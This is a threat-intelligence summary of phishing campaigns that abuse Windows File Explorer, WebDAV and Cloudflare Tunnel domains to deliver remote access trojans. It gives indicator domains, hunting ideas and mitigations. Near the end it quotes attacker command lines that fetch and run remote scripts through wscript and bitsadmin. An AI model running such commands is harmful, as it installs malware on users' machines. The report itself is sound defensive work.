2026-05-136 minhigh

Abusing Windows File Explorer and WebDAV for Malware Delivery

Threat actors are leveraging WebDAV and Windows File Explorer to deliver Remote Access Trojans (RATs) while bypassing traditional web browser security controls. By utilizing .url and .lnk shortcut files pointing to WebDAV servers hosted on temporary Cloudflare Tunnels, attackers can trick users into executing malicious scripts that appear as local files.

Sens:■ ImmediateConf:highAnalyzed:2026-03-02reports

Authors: Kahng An, Cofense Intelligence Team

ActorsXWorm RATAsync RATDcRAT

LNK WebDAV URL Shortcut RAT Cloudflare Tunnel

Source:Cofense

IOCs · 4

domain
earl-dont-princess-bit[.]trycloudflare[.]comWebDAV server hosting malicious WSH scripts executed directly via wscript.exe.
domain
frontier-shops-timothy-cal[.]trycloudflare[.]comWebDAV server hosting malicious scripts downloaded via bitsadmin.
domain
harbor-microwave-called-teams[.]trycloudflare[.]comMalicious WebDAV server domain embedded in a .url shortcut file, triggering automatic DNS and TCP connections.
domain
module-brush-sort-factory[.]trycloudflare[.]comCloudflare Tunnel domain hosting a malicious WebDAV server with script payloads.

Key Takeaways

Threat actors are abusing WebDAV via Windows File Explorer to bypass web browser security controls and deliver malware.
Campaigns heavily utilize free Cloudflare Tunnel demo instances (trycloudflare.com) to host malicious WebDAV servers.
Attackers use .url and .lnk shortcut files to initiate WebDAV connections or execute remote scripts.
URL shortcut files containing UNC paths can trigger automatic DNS lookups and outbound connections simply by opening the directory in File Explorer.
Final payloads are typically Remote Access Trojans (RATs) such as XWorm, Async RAT, and DcRAT.

Affected Systems

Windows
Windows File Explorer

Attack Chain

The attack begins with the delivery of a phishing email, often themed around finance or invoices, containing a .url or .lnk shortcut file. When the user interacts with the shortcut (or simply views the directory containing a UNC-pathed .url file), a connection is made to a remote WebDAV server hosted on a Cloudflare Tunnel. The shortcut executes built-in Windows tools like wscript.exe or cmd.exe to download and run malicious scripts (e.g., .wsh, .bat) from the WebDAV share. These scripts ultimately deploy Remote Access Trojans (RATs) such as XWorm, Async RAT, or DcRAT onto the victim's machine.

Detection Availability

YARA Rules: No
Sigma Rules: No
Snort/Suricata Rules: No
KQL Queries: No
Splunk SPL Queries: No
EQL Queries: No
Other Detection Logic: No

The article does not provide specific detection rules but recommends behavioral EDR monitoring for .url and .lnk files executing remote commands.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions can easily monitor process creation events (like wscript.exe or cmd.exe) and command-line arguments containing suspicious UNC paths or WebDAV keywords. Network Visibility: Medium — While the network traffic is routed through legitimate Cloudflare infrastructure (often over HTTPS), DNS queries to trycloudflare.com and outbound WebDAV/SMB connections to external IPs are visible. Detection Difficulty: Moderate — Detecting this requires distinguishing malicious WebDAV connections from legitimate enterprise file share activity, though the use of trycloudflare.com and script execution from WebDAV shares provides strong signals.

Required Log Sources

Process Creation (Event ID 4688 / Sysmon 1)
Network Connections (Sysmon 3)
DNS Queries (Sysmon 22)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for wscript.exe or cscript.exe executing files directly from UNC paths containing '@SSL' or 'DavWWWRoot'.	Process Creation	Execution	Low
Monitor for cmd.exe utilizing bitsadmin.exe to download files from trycloudflare.com domains.	Process Creation	Command and Control / Execution	Low
Identify .url or .lnk files triggering outbound network connections to external IP addresses over port 80 or 443.	Network Connections	Execution	Medium

Control Gaps

Browser-based download protections (SmartScreen, Safe Browsing) are bypassed because Windows File Explorer handles the connection directly.

Key Behavioral Indicators

wscript.exe executing .wsh files from WebDAV shares
UNC paths containing 'DavWWWRoot'
DNS queries to trycloudflare.com originating from explorer.exe

False Positive Assessment

Medium (Legitimate enterprise use of WebDAV, SMB, or Cloudflare Tunnels may trigger alerts, though the specific combination of .url/.lnk executing scripts from trycloudflare.com is highly suspicious).

Recommendations

Immediate Mitigation

Block or monitor DNS requests to trycloudflare.com if not required for business operations.
Investigate endpoints showing recent connections to WebDAV shares hosted on Cloudflare Tunnels.

Infrastructure Hardening

Disable the WebDAV client service (WebClient) on Windows endpoints if not actively used.
Restrict outbound SMB and WebDAV traffic to external IP addresses at the perimeter firewall.

User Protection

Configure EDR to block or alert on .url and .lnk files executing scripts from remote network shares.
Ensure Windows 'Open File - Security Warning' prompts are enabled and not suppressed via GPO.

Security Awareness

Educate users to verify the address bar in Windows File Explorer to ensure they are not accessing unfamiliar remote servers.
Train employees to recognize the risks of opening shortcut files (.url, .lnk) received via email.

MITRE ATT&CK Mapping

T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1059.005 - Command and Scripting Interpreter: Visual Basic
T1105 - Ingress Tool Transfer
T1204.001 - User Execution: Malicious Link
T1204.002 - User Execution: Malicious File
T1573 - Encrypted Channel

Additional IOCs

Domains:
- everything-teach-pearl-eat[.]trycloudflare[.]com - Cloudflare Tunnel domain used for WebDAV malware delivery.
- tiny-fixtures-glossary-advantage[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 374884.
- nasdaq-aged-sf-cheers[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 377161.
- lose-croatia-acdbentity-lt[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 377161.
- discounted-pressed-lc-vcr[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 376309.
- skills-statute-alberta-demand[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 376309.
- whats-menu-familiar-zshops[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 386717.
- publicity-jenny-paintball-gilbert[.]trycloudflare[.]com - Cloudflare Tunnel domain associated with ATR 386717.
File Paths:
- po.wsh - Malicious Windows Script Host file hosted on WebDAV server.
- dat.wsh - Malicious Windows Script Host file executed via LNK shortcut.
- rec.wsh - Malicious Windows Script Host file downloaded via bitsadmin.
- iri.bat - Malicious batch script hosted on WebDAV server.
- po##.wsh - Malicious Windows Script Host file hosted on WebDAV server.
- roi.wsf - Malicious Windows Script File hosted on WebDAV server.
Command Lines:
- Purpose: Executes a remote Windows Script Host file directly from a WebDAV share using a UNC path. | Tools: wscript.exe | Stage: Execution | wscript.exe "\\<domain>@SSL\DavWWWRoot\dat.wsh"
- Purpose: Downloads a malicious script from a remote server using bitsadmin and executes it via wscript. | Tools: cmd.exe, bitsadmin.exe, wscript.exe | Stage: Execution/Download | cmd.exe /c bitsadmin /transfer job <url> %TEMP%\rec.wsh &wscript%TEMP%\rec.wsh